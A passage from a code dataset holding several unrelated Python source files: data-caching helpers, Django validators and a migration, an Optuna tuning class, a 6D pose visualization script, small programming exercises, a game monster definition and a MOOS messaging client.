np.array(data[\"sentiment\"]), \\\n\t\t\t\t\t\t\t\t\t\t\ttrain_size=ratio, random_state=random_seed_for_splitting)\n\tdel data\n\treturn X_train, X_test, Y_train, Y_test\n\t\t\n# serializes data and saves in a (somewhat) compressed format\ndef save_zipped_pickle(obj, filename, protocol=-1):\n\twith gzip.open(filename, 'wb') as f:\n\t\tcPickle.dump(obj, f, protocol)\n\t\tf.close()\n\n# loads compressed data and restores original state\ndef load_zipped_pickle(filename):\t# loads and unpacks\n\twith gzip.open(filename, 'rb') as f:\n\t\tloaded_object = cPickle.load(f)\n\t\tf.close()\n\t\treturn loaded_object\n\ndef save_train_data(X_train, Y_train, ratio = 0.7):\n\trprint(\"Saving train data to cache (1 %)\")\n\tsave_zipped_pickle(X_train, X_Train_cache_path % ratio)\n\trprint(\"Saving train data to cache (80 %)\")\n\tsave_zipped_pickle(Y_train, Y_Train_cache_path % ratio)\n\trprint(\"Saving train data to cache (100%)\")\n\ndef save_test_data(X_test, Y_test, ratio = 0.7):\n\trprint(\"Saving test data to cache (1 %)\")\n\tsave_zipped_pickle(X_test, X_Test_cache_path % ratio)\n\trprint(\"Saving test data to cache (80 %)\")\n\tsave_zipped_pickle(Y_test, Y_Test_cache_path % ratio)\n\trprint(\"Saving test data to cache (100%)\")\n\t\ndef load_train_data(ratio = 0.7):\n\trprint(\"Loading train data from cache (1 %)\")\n\tX_train = load_zipped_pickle(X_Train_cache_path % ratio)\n\trprint(\"Loading train data from cache (80 %)\")\n\tY_train = load_zipped_pickle(Y_Train_cache_path % ratio)\n\trprint(\"Loading train data from cache (100%)\")\n\treturn X_train, Y_train\n\ndef load_test_data(ratio = 0.7):\n\trprint(\"Loading test data from cache (1 %)\")\n\tX_test = load_zipped_pickle(X_Test_cache_path % ratio)\n\trprint(\"Loading test data from cache (80 %)\")\n\tY_test = load_zipped_pickle(Y_Test_cache_path % ratio)\n\trprint(\"Loading test data from cache (100%)\")\n\treturn X_test, Y_test\n\t","repo_name":"pgombar/kaggle-popcorn","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70029234279","text":"import datetime\nfrom rest_framework import serializers\nfrom django.utils.translation import gettext_lazy as _\n\nfrom voucher.models import WorkLog\nfrom voucher.utils import get_first_valid_work_log_date\n\n\ndef valid_date_worked(date):\n if date < get_first_valid_work_log_date():\n raise serializers.ValidationError(\n detail=_(\"Date 
%(date)s is too far in the past\")\n % {\"date\": date.isoformat()}\n )\n if date > datetime.date.today():\n raise serializers.ValidationError(\n detail=_(\"Date %(date)s is in the future\") % {\"date\": date.isoformat()}\n )\n\n\nclass ValidVouchers(object):\n serializer_field = None\n\n def __call__(self, value):\n if value > 0:\n return\n\n perm = \"%s.delete_%s\" % (WorkLog._meta.app_label, WorkLog._meta.model_name)\n if self.serializer_field.parent.context.request.user.has_perm(perm):\n return\n\n raise serializers.ValidationError(detail=_(\"Vouchers must be positive\"))\n\n def set_context(self, serializer_field):\n self.serializer_field = serializer_field\n","repo_name":"cybernetisk/internsystem","sub_path":"voucher/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"26887768845","text":"def getSec():\n \"\"\"\n get from file data for settings.py file\n return { dictionary } with conf file\n \"\"\"\n ans = []\n ansDict = {}\n fname = '../../settingsPns.txt'\n\n with open(fname) as file:\n content = file.readlines()\n\n for line_elt in content:\n ans = line_elt.split(\"===\")\n if len(ans) == 2:\n key = ans[0].strip()\n value = ans[1].strip()\n assert not(\" \" in key or \" \" in value), \"Spaces in config file!\"\n ansDict[key] = value\n else:\n assert False, \"Config file has been write in wrong format!\"\n\n return ansDict","repo_name":"dawidbo/pns","sub_path":"lib/base_func.py","file_name":"base_func.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"43046370265","text":"import optuna\nimport pandas as pd\nimport numpy as np\nfrom .metrics import map_at_k\nfrom functools import partial\n\n\nclass Optimizer:\n\n @classmethod\n def from_args(cls, params_string):\n params = {}\n funcs = {\n 'float': float,\n 'int': int,\n }\n for i in range(0, len(params_string), 2):\n k, kv = params_string[i].replace('--', '').split('__')\n v = params_string[i+1]\n if k not in params:\n params[k] = {}\n if kv not in params[k]:\n params[k][kv] = v\n\n for k in params:\n for p in params[k]:\n if p != 'type':\n params[k][p] = funcs.get(params[k]['type'], str)(params[k][p])\n\n vars_ = {}\n fixed = {}\n for pn, pv in params.items():\n if 'fixed' in pv:\n fixed[pn] = pv['fixed']\n else:\n vars_[pn] = {\n 'method': f\"suggest_{pv['type']}\",\n 'params': {\n pvk: pvv\n for pvk, pvv in pv.items()\n if pvk != 'type'\n }\n }\n\n return cls(\n fixed_params=fixed,\n trial_params={\n k: (v['method'], v['params'])\n for k, v in vars_.items()\n }\n )\n\n @property\n def best_model(self):\n _, _, rec = self.train(\n params={\n **self.fixed_params,\n **self.best_params\n }\n )\n return rec\n\n @property\n def best_params(self):\n return self.get_params(self.study.best_trial)\n\n @property\n def best_metrics(self):\n return self.detailed_objective(\n self.study.best_trial\n )\n\n def __init__(self, fixed_params, trial_params):\n self.fixed_params = fixed_params\n self.trial_params = trial_params\n\n def get_params(self, trial):\n params = {}\n for var, (method, params_) in self.trial_params.items():\n params[var] = getattr(trial, method)(var, **params_)\n return {\n **params,\n **self.fixed_params\n }\n\n def detailed_objective(self, trial):\n model_params = self.get_params(trial)\n self.trainer.update_params(model_params)\n metrics, _, (_, _) = self.trainer.train()\n 
return metrics\n\n def objective(self, trial):\n model_params = self.get_params(trial)\n self.trainer.update_params(model_params)\n metrics, _, (_, _) = self.trainer.train()\n return metrics['map10']\n\n def optimize(self, trials, trainer):\n self.study = optuna.create_study(direction='maximize')\n self.trainer = trainer\n\n self.study.optimize(\n self.objective,\n n_trials=trials\n )\n","repo_name":"d-emelyanov/recsys-course","sub_path":"common/common/tuning.py","file_name":"tuning.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6289145024","text":"import mmcv\nimport os.path as osp\nimport numpy as np\nimport sys\nfrom tqdm import tqdm\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.structures import BoxMode\nimport torch\n\ncur_dir = osp.dirname(osp.abspath(__file__))\nsys.path.insert(0, osp.join(cur_dir, \"../../../../\"))\n\nfrom lib.vis_utils.colormap import colormap\nfrom lib.utils.mask_utils import cocosegm2mask, get_edge\nfrom core.utils.data_utils import read_image_mmcv\nfrom core.gdrn_modeling.datasets.dataset_factory import register_datasets\nfrom transforms3d.quaternions import quat2mat\nfrom lib.egl_renderer.egl_renderer_v3 import EGLRenderer\n\nscore_thr = 0.3\ncolors = colormap(rgb=False, maximum=255)\n\nid2obj = {\n 1: \"ape\",\n # 2: 'benchvise',\n # 3: 'bowl',\n # 4: 'camera',\n 5: \"can\",\n 6: \"cat\",\n # 7: 'cup',\n 8: \"driller\",\n 9: \"duck\",\n 10: \"eggbox\",\n 11: \"glue\",\n 12: \"holepuncher\",\n # 13: 'iron',\n # 14: 'lamp',\n # 15: 'phone'\n}\nobjects = list(id2obj.values())\n\nwidth = 640\nheight = 480\ntensor_kwargs = {\"device\": torch.device(\"cuda\"), \"dtype\": torch.float32}\nimage_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()\nseg_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()\n# image_tensor = torch.empty((480, 640, 4), **tensor_kwargs).detach()\n\nmodel_dir = \"datasets/BOP_DATASETS/lmo/models/\"\n\nmodel_paths = [osp.join(model_dir, f\"obj_{obj_id:06d}.ply\") for obj_id in id2obj]\n\nren = EGLRenderer(model_paths, vertex_scale=0.001, use_cache=True, width=width, height=height)\n\n# NOTE:\npred_path = \"output/gdrn/lmo/a6_cPnP_AugAAETrunc_BG0.5_lmo_real_pbr0.1_40e/inference_model_final/lmo_test/a6-cPnP-AugAAETrunc-BG0.5-lmo-real-pbr0.1-40e-test_lmo_test_preds.pkl\"\n\nvis_dir = (\n \"output/gdrn/lmo/a6_cPnP_AugAAETrunc_BG0.5_lmo_real_pbr0.1_40e/inference_model_final/lmo_test/lmo_vis_gt_pred_full\"\n)\nmmcv.mkdir_or_exist(vis_dir)\n\nprint(pred_path)\npreds = mmcv.load(pred_path)\n\ndataset_name = \"lmo_test\"\nprint(dataset_name)\nregister_datasets([dataset_name])\n\nmeta = MetadataCatalog.get(dataset_name)\nprint(\"MetadataCatalog: \", meta)\nobjs = meta.objs\n\ndset_dicts = DatasetCatalog.get(dataset_name)\nfor d in tqdm(dset_dicts):\n K = d[\"cam\"]\n file_name = d[\"file_name\"]\n img = read_image_mmcv(file_name, format=\"BGR\")\n\n scene_im_id_split = d[\"scene_im_id\"].split(\"/\")\n scene_id = scene_im_id_split[0]\n im_id = int(scene_im_id_split[1])\n\n imH, imW = img.shape[:2]\n annos = d[\"annotations\"]\n masks = [cocosegm2mask(anno[\"segmentation\"], imH, imW) for anno in annos]\n bboxes = [anno[\"bbox\"] for anno in annos]\n bbox_modes = [anno[\"bbox_mode\"] for anno in annos]\n bboxes_xyxy = np.array(\n [BoxMode.convert(box, box_mode, BoxMode.XYXY_ABS) for box, box_mode in zip(bboxes, bbox_modes)]\n )\n quats = [anno[\"quat\"] for anno in annos]\n transes = 
[anno[\"trans\"] for anno in annos]\n Rs = [quat2mat(quat) for quat in quats]\n # 0-based label\n cat_ids = [anno[\"category_id\"] for anno in annos]\n\n obj_names = [objs[cat_id] for cat_id in cat_ids]\n\n est_Rs = []\n est_ts = []\n\n gt_Rs = []\n gt_ts = []\n\n labels = []\n\n for anno_i, anno in enumerate(annos):\n obj_name = obj_names[anno_i]\n\n try:\n R_est = preds[obj_name][file_name][\"R\"]\n t_est = preds[obj_name][file_name][\"t\"]\n score = preds[obj_name][file_name][\"score\"]\n except:\n continue\n if score < score_thr:\n continue\n\n labels.append(objects.index(obj_name)) # 0-based label\n\n est_Rs.append(R_est)\n est_ts.append(t_est)\n gt_Rs.append(Rs[anno_i])\n gt_ts.append(transes[anno_i])\n\n im_gray = mmcv.bgr2gray(img, keepdim=True)\n im_gray_3 = np.concatenate([im_gray, im_gray, im_gray], axis=2)\n\n gt_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(gt_Rs, gt_ts)]\n poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(est_Rs, est_ts)]\n\n ren.render(labels, poses, K=K, image_tensor=image_tensor, background=im_gray_3)\n ren_bgr = (image_tensor[:, :, :3].detach().cpu().numpy() + 0.5).astype(\"uint8\")\n\n for label, gt_pose, est_pose in zip(labels, gt_poses, poses):\n ren.render([label], [gt_pose], K=K, seg_tensor=seg_tensor)\n gt_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype(\"uint8\")\n\n ren.render([label], [est_pose], K=K, seg_tensor=seg_tensor)\n est_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype(\"uint8\")\n\n gt_edge = get_edge(gt_mask, bw=3, out_channel=1)\n est_edge = get_edge(est_mask, bw=3, out_channel=1)\n\n ren_bgr[gt_edge != 0] = np.array(mmcv.color_val(\"blue\"))\n ren_bgr[est_edge != 0] = np.array(mmcv.color_val(\"green\"))\n\n vis_im = ren_bgr\n\n save_path_0 = osp.join(vis_dir, \"{}_{:06d}_vis0.png\".format(scene_id, im_id))\n mmcv.imwrite(img, save_path_0)\n\n save_path = osp.join(vis_dir, \"{}_{:06d}_vis1.png\".format(scene_id, im_id))\n mmcv.imwrite(vis_im, save_path)\n\n # if True:\n # # grid_show([img[:, :, ::-1], vis_im[:, :, ::-1]], [\"im\", \"est\"], row=1, col=2)\n # # im_show = cv2.hconcat([img, vis_im, vis_im_add])\n # im_show = cv2.hconcat([img, vis_im])\n # cv2.imshow(\"im_est\", im_show)\n # if cv2.waitKey(0) == 27:\n # break # esc to quit\n\n# ffmpeg -r 5 -f image2 -s 1920x1080 -pattern_type glob -i \"./lmo_vis_gt_pred_full_video/*.png\" -vcodec libx264 -crf 25 -pix_fmt yuv420p lmo_vis_video.mp4\n","repo_name":"shanice-l/gdrnpp_bop2022","sub_path":"core/gdrn_modeling/tools/lmo/lmo_3_vis_poses_full.py","file_name":"lmo_3_vis_poses_full.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"18"} +{"seq_id":"22004383267","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport portfolioFile.services\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='HomePage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('landingImage', models.ImageField(null=True, upload_to=portfolioFile.services.get_main_home_upload_path)),\n ('landingImageText', models.CharField(max_length=200, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='SiteInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', 
models.ImageField(upload_to=portfolioFile.services.get_siteInfo_image_upload_path)),\n ('text', models.CharField(default=b'No Text Given', max_length=100)),\n ('homePage', models.OneToOneField(to='public.HomePage')),\n ],\n ),\n ]\n","repo_name":"amitsethi0843/wyrelist","sub_path":"public/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71392977961","text":"n = int(input(\"Type a number: \"))\n\noption = int(input(\"Type option 1-SUM or 2-MULTIPLY: \"))\n\nif option == 1:\n print(sum(range(1, n + 1)))\nif option == 2:\n product = 1\n for i in range(1, n + 1):\n product = product * i\n print(product)\n","repo_name":"Kalo7o/VUTP-Python","sub_path":"exercise_01/06.Sum_or_Product.py","file_name":"06.Sum_or_Product.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7688921594","text":"import sys\r\narr1=list(sys.stdin.readline().rstrip())\r\nm=int(sys.stdin.readline())\r\narr2=[]\r\ncursor= len(arr1)\r\nfor i in range(m):\r\n command=list(sys.stdin.readline().split())\r\n \r\n if command[0]=='P':\r\n arr1.append(command[1])\r\n elif command[0]=='L':\r\n if arr1:\r\n arr2.append(arr1.pop())\r\n elif command[0]=='D':\r\n if arr2:\r\n arr1.append(arr2.pop())\r\n else:\r\n if arr1:\r\n arr1.pop()\r\narr1.extend(reversed(arr2)) \r\nprint(''.join(arr1))","repo_name":"Hellol77/Algorithm","sub_path":"백준/Silver/1406. 에디터/에디터.py","file_name":"에디터.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2933192489","text":"import datacombine as m\nimport price as p\n\n#Function to import price data\ndef Price(y):\n price = p.ZipPrice(y)\n price = price.drop(['zipcode','year'], axis = 1)\n price = price.groupby(['boro','type']).mean().reset_index()\n return price\n\n#Create Training data files for 2013,2014\ny = [2013,2014]\n\nfor i in y:\n traindata = m.Data(i)\n trainprice = Price(i)\n traindata = traindata.merge(trainprice, on = 'boro')\n traindata.to_csv('traindata_'+str(i)+'.csv')\n\n#Create Test data file for 2015\ntestdata = m.Data(2015)\ntestdata.to_csv('testdata.csv')\n\n#Create Actual Price file for comparison\nactdata = Price(2015)\nactdata.to_csv('Actual_data.csv')\n","repo_name":"sanketpatel0512/python_class_project","sub_path":"datafile.py","file_name":"datafile.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38019642589","text":"from Append import * \nfrom Write import *\nfrom Read import *\nfrom Directory import * # these import all of the needed functions\n\nL = 0 # L for loop\nwhile L != 1 :\n print(\" A = Append\")\n print(\" D = Directory\")\n print(\" R = Read\")\n print(\" W = Write\")\n print(\" Q = quit\")\n\n Choice = input(\"what is your input\").strip().upper() #removes whitespace and capitalizes input\n if Choice == 'A':\n appendFile()\n if Choice == 'D':\n print(\"C = Create Directory\")\n print(\"D = Delete Directory\")\n print(\"X = Change Directory\")\n Choice = input().strip().upper()\n if Choice == 'C':\n CreateDirectory()\n if Choice == 'D':\n DeleteDirectory()\n if Choice == 'X':\n ChangeDirectory()\n if Choice == 'R':\n readFile()\n if Choice == 'W':\n CreateFile()\n if Choice == 'Q': #breaks loop\n L = 1 
\n","repo_name":"ronnyarsenal/OS-file-operations","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9863724625","text":"# no use for now\nimport enum\n\nimport six\n\n\nclass BaseModel(object):\n pass\n\n\nclass ObjectModel(BaseModel):\n def __init__(self, data, node):\n if not isinstance(data, dict):\n raise TypeError(\"A dict expected, got a '%s' instead\" % type(data))\n self._node = node\n self._data = data\n self._name = node._path[-1]\n for k in node.properties._keys():\n if k not in data:\n continue\n v = data[k]\n m = node.properties._get(k)\n if m._is_schema:\n m = m.getModel()\n v = m(v)\n setattr(self, k, v)\n\n def __iter__(self):\n return iter(self._data)\n\n def __contains__(self, item):\n return item in self._data\n\n def __repr__(self):\n return '%s(%s)' % (\n self._name,\n ', '.join(['%s=%s' % (k, repr(v)) for k, v in six.iteritems(self.__dict__) if k in self._data])\n )\n\n\nclass ArrayModel(BaseModel, list):\n def __init__(self, data, node):\n if not isinstance(data, (list, tuple)):\n raise TypeError(\"A list or tuple expected, got a '%s' instead\" % type(data))\n self._data = data\n self._node = node\n m = node.items.getModel()\n for i in data:\n self.append(m(i))\n\n\nclass ImmutableModel(BaseModel):\n def __init__(self, data):\n self._data = data\n\n def __get__(self, instance, owner):\n if isinstance(self._data, enum.Enum):\n return self._data.value\n return self._data\n","repo_name":"Revolution1/etcd3-py","sub_path":"scripts/basemodel.py","file_name":"basemodel.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"18"} +{"seq_id":"70210801960","text":"#!/usr/bin/python3\n\n\"\"\" This module defines the Square class. \"\"\"\n\n\nclass Square:\n \"\"\"This class represents a square.\"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"\n Args:\n size (int, size): The size of the square. Defaults to 0.\n position (tuple, optional): The position of the square. 
Defaults to (0, 0).\n\n        Raises:\n            TypeError: If the size is not an integer.\n            ValueError: If the size is less than 0.\n            TypeError: If the position is not a tuple of 2 positive integers.\n        \"\"\"\n        self.size = size\n        self.position = position\n\n    @property\n    def size(self):\n        \"\"\"Retrieves the size of the square.\"\"\"\n\n        return self.__size\n\n    @size.setter\n    def size(self, value):\n        \"\"\"Sets the size of the square.\"\"\"\n\n        if not isinstance(value, int):\n            raise TypeError(\"size must be an integer\")\n        elif value < 0:\n            raise ValueError(\"size must be >= 0\")\n        else:\n            self.__size = value\n\n    @property\n    def position(self):\n        \"\"\"\n        Retrieves the position of the square.\n\n        Returns:\n            tuple: The position of the square.\n\n        \"\"\"\n        return self.__position\n\n    @position.setter\n    def position(self, value):\n        \"\"\"\n        Sets the position of the square.\n\n        Args:\n            value (tuple): The new position of the square.\n\n        Raises:\n            TypeError: If the position is not a tuple of 2 positive integers.\n            ValueError: If the position contains negative integers.\n\n        \"\"\"\n        if (\n            not isinstance(value, tuple)\n            or len(value) != 2\n            or not all(isinstance(coord, int) for coord in value)\n            or not all(coord >= 0 for coord in value)\n        ):\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n        else:\n            self.__position = value\n\n    def area(self):\n        \"\"\"\n        Computes the area of the square.\n        Returns:\n            int: The area of the square.\n        \"\"\"\n        return self.__size**2\n\n    def my_print(self):\n        \"\"\"\n        Prints the square using the character '#'.\n\n        \"\"\"\n        if self.__size == 0:\n            print()\n        else:\n            for _ in range(self.__position[1]):\n                print()\n            for _ in range(self.__size):\n                print(\" \" * self.__position[0] + \"#\" * self.__size)\n","repo_name":"unrealjo-alx/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36410546459","text":"class Solution:\n    def tribonacci(self, n: int) -> int:\n        ''' same as lc 70/509 fibonacci problem\n        plain recursion will TLE here, just memoize\n        Tn+3 = Tn + Tn+1 + Tn+2 '''\n        if n == 0:\n            return 0\n        if n == 1:\n            return 1\n        nums = [0, 1, 1]\n        for i in range(3, n+1):\n            nums.append(nums[i-1]+nums[i-2]+nums[i-3])\n        return nums[-1]\n\n        '''\n        method 2\n        recursion + memoize will not time out\n        '''\n        cache = {0: 0, 1: 1, 2: 1}\n\n        def memo(n):\n            if n in cache:\n                return cache[n]\n            res = memo(n - 3) + memo(n - 2) + memo(n - 1)\n            cache[n] = res\n            return res\n\n        return memo(n)\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode1137.py","file_name":"leetcode1137.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21816790737","text":"from flask import session, flash, redirect, url_for\nfrom functools import wraps # For login_required\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n\ndef allowed_file(filename):\n    return '.' 
in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef login_required(f):\n    @wraps(f)\n    def wrap(*args, **kwargs):\n        if 'logged_in' in session:\n            # arguments and keyword arguments\n            return f(*args, **kwargs)\n        else:\n            flash(u'You need to login first.', 'danger')\n            return redirect(url_for('main.login'))\n    return wrap\n","repo_name":"minute-tech/flask-dev.minute.tech","sub_path":"minutetech/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73198656361","text":"Valkyrie = genMonster(\"Valkyrie\", (139, 6080), \"a 
","repo_name":"Pijukatel/PyBites","sub_path":"359/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73198656361","text":"Valkyrie = genMonster(\"Valkyrie\", (139, 6080), \"a Valkyrie\")\nValkyrie.setOutfit(113, 57, 95, 113)\nValkyrie.setTargetChance(10)\nValkyrie.bloodType(\"blood\")\nValkyrie.setHealth(190)\nValkyrie.setExperience(85)\nValkyrie.setSpeed(176) # Correct\nValkyrie.walkAround(1,1,1) # energy, fire, poison\nValkyrie.setBehavior(summonable=450, hostile=1, illusionable=1, convinceable=450, pushable=0, pushItems=1, pushCreatures=0, targetDistance=1, runOnHealth=10)\nValkyrie.voices(\"Another head for me!\", \"Head off!\", \"Your head will be mine!\", \"Stand still!\", \"One more head for me!\")\nValkyrie.setImmunity(0,0,0) # paralyze, invisible, lifedrain\nValkyrie.setDefense(13, fire=0.9, earth=1.0, energy=1.0, ice=0.9, holy=0.95, death=1.05, physical=1.1, drown=1.0)\nValkyrie.regMelee(70)\nValkyrie.regDistance(40, ANIMATION_SPEAR, chance(21))\nValkyrie.loot( (\"girlish hair decoration\", 5.5), (\"red apple\", 11.5, 2), (\"hunting spear\", 4.75), (\"meat\", 29.75, 3), (2148, 100, 12), (\"spear\", 100, 3), (\"chain armor\", 8.0), (\"protective charm\", 2.75), (\"plate armor\", 1.25), (\"skull\", 0.5), (\"protection amulet\", 0.75), (\"double axe\", 0.25), (\"health potion\", 0.25) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Humans/Amazons/Valkyrie.py","file_name":"Valkyrie.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7422727261","text":"class Worker:\n def __init__(self, name, surname, position='cleaner'):\n self.name, self.surname, self.position = name, surname, position\n self._income = {'director': {'salary': 70000, 'bonus': 20000},\n 'office clerk': {'salary': 40000, 'bonus': 5000},\n 'cleaner': {'salary': 20000, 'bonus': 1000}}\n self.positions = list(self._income.keys())\n\n\nclass Position(Worker):\n def get_full_name(self):\n return f'{self.name} {self.surname}'\n\n def get_total_income(self):\n if self.position in self._income:\n result = self._income[self.position]\n return result['salary'] + result['bonus']\n else:\n return 'No such position'\n\n\nstuff = Position('Василий', 'Лентюгов', 'director')\nprint(stuff.get_full_name())\nprint(stuff.get_total_income())\n
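# Expected output (a sketch based on the income table above):\n# Василий Лентюгов\n# 90000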
","repo_name":"NickHlzv/Python","sub_path":"Lesson6.Homework/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"438204042","text":"\"\"\" Handles displaying the image preview \"\"\"\nimport wx\n\n\nclass ImagePreview(wx.Panel):\n def __init__(self, parent: wx.Window=None):\n \"\"\" Creates an image preview with the specified parent window \"\"\"\n super(ImagePreview, self).__init__(parent, id=wx.ID_ANY)\n self.parent = parent\n self.bitmap = None\n self.draw_bitmap = None\n self.image = None\n self.background_color = wx.BLACK_BRUSH\n width, height = self.GetClientSize()\n self.buffer = wx.Bitmap(width, height)\n\n # load the background color from the parent\n if parent is not None:\n self.background_color = wx.Brush(parent.GetBackgroundColour())\n\n self.SetDoubleBuffered(True)\n self.update_bitmap()\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_SIZE, self.on_resize)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase)\n\n def update_bitmap(self):\n \"\"\" Updates the bitmap or image data to fit the screen \"\"\"\n if self.image is not None: # there is a valid image\n image = self.image\n elif self.bitmap is not None: # there was only a bitmap provided\n image = self.bitmap.ConvertToImage()\n else:\n image = None\n\n # redraw the buffer\n dc = wx.MemoryDC(self.buffer)\n dc.SelectObject(self.buffer)\n dc.SetBackground(self.background_color)\n dc.Clear()\n\n # draw the image if it's valid\n if image is not None:\n # scale the image to the client dimensions and try to contain the aspect ratio\n width, height = image.GetWidth(), image.GetHeight()\n client_width, client_height = self.GetClientSize()\n\n # resize with aspect ratio\n if client_width < width or client_height < height:\n scale = float(client_width) / width\n\n if scale > float(client_height) / height:\n scale = float(client_height) / height\n\n new_w, new_h = int(width * scale), int(height * scale)\n if new_w < 1:\n new_w = 1\n if new_h < 1:\n new_h = 1\n\n image = image.Scale(new_w, new_h, wx.IMAGE_QUALITY_HIGH)\n\n # draw the bitmap in the center of the screen\n self.draw_bitmap = image.ConvertToBitmap()\n self.center_coords = int((client_width - self.draw_bitmap.GetWidth()) // 2), int((client_height - self.draw_bitmap.GetHeight()) // 2)\n dc.DrawBitmap(self.draw_bitmap, *self.center_coords)\n\n del dc # push the updates to the buffer\n\n # push the buffer to the screen\n self.Refresh(False)\n\n def set_bitmap(self, bitmap):\n \"\"\" Updates the bitmap\n\n :param bitmap: the wx.Bitmap or wx.Image object\n \"\"\"\n if isinstance(bitmap, wx.Image):\n self.image = bitmap\n self.bitmap = None\n else:\n self.bitmap = bitmap\n self.image = None\n self.update_bitmap()\n\n def set_background_color(self, color):\n \"\"\" Set the background color of the area that isn't exposed by the image\n\n :param color: the wx Color object\n \"\"\"\n self.background_color = wx.Brush(color)\n self.update_bitmap()\n\n def on_erase(self, event):\n \"\"\" Handle the erase background event \"\"\"\n pass\n\n def on_resize(self, event):\n \"\"\" Handles the resizing of the window \"\"\"\n width, height = self.GetClientSize()\n self.buffer = wx.Bitmap(width, height)\n self.update_bitmap()\n\n def on_paint(self, event):\n \"\"\" Paint event handler: blits the pre-rendered buffer to the screen \"\"\"\n wx.BufferedPaintDC(self, self.buffer)\n","repo_name":"smerkousdavid/membrane-analysis","sub_path":"structure/interactive/gui/image_preview.py","file_name":"image_preview.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17071434460","text":"#!/usr/bin/env python3\nfrom pymoos import pymoos\nimport time\n\nclass printerMOOS(pymoos.comms):\n \"\"\"printerMOOS is an example python MOOS app.\n\n Attributes:\n moos_community: a string representing the address of the Community\n moos_port: an integer defining the port\n \"\"\"\n def __init__(self, moos_community, moos_port):\n \"\"\"Initiates MOOSComms, sets the callbacks and runs the loop\"\"\"\n super(printerMOOS, self).__init__()\n self.server = moos_community\n self.port = moos_port\n self.name = 'printerMOOS'\n self.iter = 0\n\n self.set_on_connect_callback(self.__on_connect)\n self.set_on_mail_callback(self.__on_new_mail)\n self.run(self.server, self.port, self.name)\n\n def __on_connect(self):\n \"\"\"OnConnect callback\"\"\"\n print(\"Connected to\", self.server, self.port,\n \"under the name \", self.name)\n return self.register('SPHINX_SR', 0)\n\n def __on_new_mail(self):\n \"\"\"OnNewMail callback\"\"\"\n for msg in self.fetch():\n if msg.key() == \"SPHINX_SR\":\n print(\"SPHINX heard:\" + msg.string())\n elif msg.key() == \"GOOGLE_SR\":\n print(\"GOOGLE heard:\" + msg.string())\n return True\n\n
